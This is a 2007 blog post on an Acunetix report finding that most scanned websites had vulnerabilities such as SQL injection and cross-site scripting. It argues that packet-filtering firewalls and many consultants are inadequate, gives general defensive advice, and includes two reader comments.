91% of web sites are hackable…find out what to do about it

by ron on March 3, 2007

HackerAcunetix recently reported that:

… on average, 91% of the Web sites scanned contained some form of Web site vulnerability. Those exploits ranged from the more serious, such as SQL Injection and Cross Site Scripting, to more minor ones, like local path disclosure or directory listing.

Out of 3,200 sites scanned, 70% had vulnerabilities with either a medium- or high-risk rating

I would like to say that I can’t believe that the numbers are that high, but the reality is that it doesn’t surprise me.


Three main factors:

  • web servers (and web applications) have, and will continue to have vulnerabilities which can be exploited by hackers
  • existing conventional firewalls are almost useless in preventing these attacks
  • there’s an extreme lack of people who understand security from a hacking perspective

Web servers will continue to come out with new versions and keep adding new features in order to remain competitive and not get pushed out of the market. This leads to ongoing new opportunities to find vulnerabilities in sloppy code writing. So I doubt that this factor will ever go away.

Hopefully web server vendors will increasingly get their developers trained in security, so that they can learn how to “protect” their code from attack. This will definitely help, but it won’t make the problem go away. New vulnerabilities will consistently be found in new web server software releases.

The second factor is what really bugs me though. People don’t realise that a conventional port-level (layer 3) firewall is almost useless against an experienced hacker in being able to protect your network.

And what bugs me the most is that so-called security experts don’t know the first thing about hacking. It’s no wonder then that their advice of using conventional firewalls is resulting is this astronomically high figure of networks that are vulnerable to attack.

Every so-called security expert I’ve met so far didn’t know what I was talking about when I asked them if their recommended firewall could prevent a netcat session going through it. I just got a blank stare, and a few seconds later they asked “what’s netcat?”

For a security person to not know what netcat is, is the equivalent of a network engineer not knowing what the ping utility is, or a chief financial officer not knowing what the acronym ROI stands for. It is the single most basic (yet extremely powerful) hacking tool around. Hackers know it as the “TCP/IP swiss army knife” since you can use it to do almost anything. If your security consultant doesn’t know what netcat is or how it can be used, then I’m sorry, but it’s game over for you.

It’s been estimated that around 80% of all hacks and exploits make use of the netcat utility in some fashion. I can’t say that I personally believe that the number is that high, but you can count on the fact that the majority of hacks and exploits (>50%) definitely do make use of netcat in some way.

Let’s take a closer look at some of the data discovered in the Acunetix report.

Most common vulnerabilities(click on the thumbnail on the left to see a larger version)

Firstly, notice that almost all of the vulnerabilities found were application-level vulnerabilities.

To repeat what I mentioned before, a traditional (packet-filtering) firewall would do absolutely nothing to prevent these attacks.

Trend(click on the thumbnail on the left to see a larger version)

The second interesting thing to note from the report is the ever increasing trend of more and more sites being vulnerable. This is simply a result of more and more websites going online all the time. I don’t see this ever changing, so we can expect to see more and more sites being vulnerable to attack.

Ok, so that’s probably lit a fire under your butt, and you now want to know what to do about it.

Action items:

  • Start educating yourself on the topic of network security. A great way to start is by reading a book called Hacking Exposed
  • If you don’t have the time to learn about network security, then hire someone that does. But remember that most security people don’t have a clue about how to defend against hackers. I would suggest that you ask them about: netcat, cross site scripting vulnerabilities, and sql injection attacks. If you get a blank stare, then find someone else.
  • Realize that a traditional firewall won’t help you one bit in protecting from application-layer attacks. Replace your firewall with a strong application layer firewall.
  • Keep all servers patched, especially those that provide services to the internet. The days of waiting 3 months to make sure that a patch “is stable” are gone. Hacks now become available hours after a vulnerability is discovered. Patch your systems quickly, but do ensure that you have a roll-back strategy.
  • Restrict the amount of traffic going through your firewall. Ideally, you should never have direct access from the internet to the internal network segment (most people understand this but do very little about it), or from the internal network segment to the internet (almost nobody understands that this is a huge security risk).
  • Make use of relays/proxies in a Demilitarized Zone
  • Make sure that your edge devices (firewall, routers, etc) are properly logging information and that you regularly go through the logs
  • Consider using an Intrusion Prevention System
  • Run vulnerability scans (or penetration tests) on your own systems, and then plug up the holes. Acunetix are currently offering a free security scan you could make use of.

Since one of the biggest problems is that security people are unaware of how to hack, and therefore completely unaware of how to protect against these hacks, I’m going to be creating posts over the coming weeks showing you step-by-step exactly how to carry out a hack against a network.

Yes, this will mean that it will make it easier for “script kiddies” to now have an easy guide to follow to compromize your systems, but it’s the only way to do something about this problem.


{ 2 comments… read them below or add one }

Ian M March 5, 2007 at 3:24 pm

We must remember that there is a difference between a ‘system vulnerability’ and a hole so big that it will allow you to hi-jack a system. Most vulnerabilities relate to the ability of a ‘hacker’ to cause a web server to stop functioning and/or crash.
This is a very different story to be able to hop from a web server to the back-end sql database etc.

Just my 2 cents worth.


Ron Bertino March 5, 2007 at 9:48 pm

Hi Ian

You’ll notice from the Acunetix report that out of the 91% of sites with vulnerabilities, 42% of them had cross-site scripting vulnerabilities and 50% of them were vulnerable to sql injection attacks.

Cross site scripting attacks make the client that is accessing the vulnerable server vulnerable to attack. In other words, the user is at risk, not the web server, in this instance.

So you’re correct in saying that the cross-site scripting attacks would not lead to being able to compromise the target network that had the vulnerable server.

In contrast though, 50% of systems were vulnerable to sql injection attacks. This does mean that the target web server is vulnerable to attack. Even worse, a susceptible web server could then allow the hacker to completely take over the entire internal network.

SQL injection attacks can be very nasty, and can literally mean having your entire internal network coming under the hacker’s control.


Leave a Comment

Time limit is exhausted. Please reload CAPTCHA.